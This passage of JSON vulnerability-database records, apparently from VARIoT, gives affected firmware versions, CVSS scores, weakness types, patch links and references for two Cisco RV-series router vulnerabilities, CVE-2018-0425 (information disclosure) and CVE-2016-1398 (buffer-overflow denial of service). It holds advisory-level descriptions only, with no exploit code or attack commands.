"model": "rv110w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.2.1.7"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 0.6,
"vendor": "cisco",
"version": "1.0.0.21"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
},
{
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
}
]
},
"cve": "CVE-2018-0425",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-0425",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-18071",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-118627",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-0425",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-0425",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-0425",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-18071",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-264",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-118627",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "VULHUB",
"id": "VHN-118627"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
},
{
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper access control to files within the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device. A successful exploit could allow the attacker to gain access to sensitive configuration information, including user authentication credentials. The RV110W is a Wireless-NVPN firewall router. The RV130W is a Wireless-N multi-function VPN router. The RV215W is a Wireless-NVPN router",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-0425"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "VULHUB",
"id": "VHN-118627"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-0425",
"trust": 3.1
},
{
"db": "SECTRACK",
"id": "1041676",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201809-264",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2018-18071",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-118627",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "VULHUB",
"id": "VHN-118627"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
},
{
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"id": "VAR-201810-0303",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "VULHUB",
"id": "VHN-118627"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
}
]
},
"last_update_date": "2024-11-23T22:34:06.421000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20180905-rv-routers-disclosure",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-rv-routers-disclosure"
},
{
"title": "CiscoRV110W, RV130W, RV215W Information Disclosure Vulnerability Patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/139763"
},
{
"title": "Cisco RV110W Wireless-N VPN Firewall , RV130W Wireless-N Multifunction VPN Router and RV215W Wireless-N VPN Router Repair measures for information disclosure vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=84595"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.9
},
{
"problemtype": "CWE-269",
"trust": 1.1
},
{
"problemtype": "CWE-284",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-118627"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180905-rv-routers-disclosure"
},
{
"trust": 1.7,
"url": "http://www.securitytracker.com/id/1041676"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-0425"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-0425"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "VULHUB",
"id": "VHN-118627"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
},
{
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"db": "VULHUB",
"id": "VHN-118627"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
},
{
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"date": "2018-10-05T00:00:00",
"db": "VULHUB",
"id": "VHN-118627"
},
{
"date": "2018-12-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"date": "2018-09-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-264"
},
{
"date": "2018-10-05T14:29:01.060000",
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-18071"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-118627"
},
{
"date": "2018-12-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010562"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-264"
},
{
"date": "2024-11-21T03:38:12.153000",
"db": "NVD",
"id": "CVE-2018-0425"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Cisco RV Product Vulnerable to information disclosure",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010562"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-264"
}
],
"trust": 0.6
}
}
var-201607-0543
Vulnerability from variot
Buffer overflow in the web-based management interface on Cisco RV110W devices with firmware through 1.2.1.4, RV130W devices with firmware through 1.0.2.7, and RV215W devices with firmware through 1.3.0.7 allows remote authenticated users to cause a denial of service (device reload) via a crafted HTTP request, aka Bug ID CSCux86669. Cisco RV110W , RV130W and RV215W Wireless-N VPN The device firmware contains a buffer overflow vulnerability. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a denial-of-service vulnerability. Attackers can exploit this issue to reload the affected device, denying service to legitimate users. This issue is being tracked by Cisco bug IDs CSCux86664, CSCux86669 and CSCux86675
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201607-0543",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rv215w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.2.0.15"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.0.1.3"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.1.0.5"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.3.0.7"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.2.0.14"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.1.0.9"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.2.1.4"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.2.0.9"
},
{
"model": "rv110w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.2.0.10"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 1.6,
"vendor": "cisco",
"version": "1.0.0.21"
},
{
"model": "rv215w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.1.0.6"
},
{
"model": "rv130w",
"scope": "eq",
"trust": 1.0,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": "lte",
"trust": 0.8,
"vendor": "cisco",
"version": "1.2.1.4"
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": "lte",
"trust": 0.8,
"vendor": "cisco",
"version": "1.0.2.7"
},
{
"model": "rv215w wireless-n vpn router",
"scope": "lte",
"trust": 0.8,
"vendor": "cisco",
"version": "1.3.0.7"
},
{
"model": "rv110w wireless-n vpn firewall",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv130w wireless-n multifunction vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
},
{
"model": "rv215w wireless-n vpn router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
},
{
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco would like to thank security researcher Samuel Huntley for finding and reporting this vulnerability.",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
}
],
"trust": 0.6
},
"cve": "CVE-2016-1398",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CVE-2016-1398",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "CNVD-2016-04097",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 6.8,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.0,
"id": "VHN-90217",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2016-1398",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-1398",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2016-1398",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2016-04097",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201606-365",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-90217",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"db": "VULHUB",
"id": "VHN-90217"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
},
{
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in the web-based management interface on Cisco RV110W devices with firmware through 1.2.1.4, RV130W devices with firmware through 1.0.2.7, and RV215W devices with firmware through 1.3.0.7 allows remote authenticated users to cause a denial of service (device reload) via a crafted HTTP request, aka Bug ID CSCux86669. Cisco RV110W , RV130W and RV215W Wireless-N VPN The device firmware contains a buffer overflow vulnerability. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a denial-of-service vulnerability. \nAttackers can exploit this issue to reload the affected device, denying service to legitimate users. \nThis issue is being tracked by Cisco bug IDs CSCux86664, CSCux86669 and CSCux86675",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-1398"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"db": "BID",
"id": "91218"
},
{
"db": "VULHUB",
"id": "VHN-90217"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-1398",
"trust": 3.4
},
{
"db": "SECTRACK",
"id": "1036115",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2016-04097",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201606-365",
"trust": 0.6
},
{
"db": "BID",
"id": "91218",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-90217",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"db": "VULHUB",
"id": "VHN-90217"
},
{
"db": "BID",
"id": "91218"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
},
{
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"id": "VAR-201607-0543",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"db": "VULHUB",
"id": "VHN-90217"
}
],
"trust": 1.2914166040000001
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04097"
}
]
},
"last_update_date": "2024-11-23T22:27:01.439000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "cisco-sa-20160615-rv3",
"trust": 0.8,
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160615-rv3"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-90217"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv3"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1036115"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1398"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1398"
},
{
"trust": 0.6,
"url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv3/"
},
{
"trust": 0.3,
"url": "http://www.cisco.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"db": "VULHUB",
"id": "VHN-90217"
},
{
"db": "BID",
"id": "91218"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
},
{
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"db": "VULHUB",
"id": "VHN-90217"
},
{
"db": "BID",
"id": "91218"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"db": "CNNVD",
"id": "CNNVD-201606-365"
},
{
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"date": "2016-07-03T00:00:00",
"db": "VULHUB",
"id": "VHN-90217"
},
{
"date": "2016-06-15T00:00:00",
"db": "BID",
"id": "91218"
},
{
"date": "2016-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"date": "2016-06-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-365"
},
{
"date": "2016-07-03T21:59:07.680000",
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-06-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2016-04097"
},
{
"date": "2017-09-01T00:00:00",
"db": "VULHUB",
"id": "VHN-90217"
},
{
"date": "2016-06-15T00:00:00",
"db": "BID",
"id": "91218"
},
{
"date": "2016-07-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-003417"
},
{
"date": "2016-07-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201606-365"
},
{
"date": "2024-11-21T02:46:22.127000",
"db": "NVD",
"id": "CVE-2016-1398"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
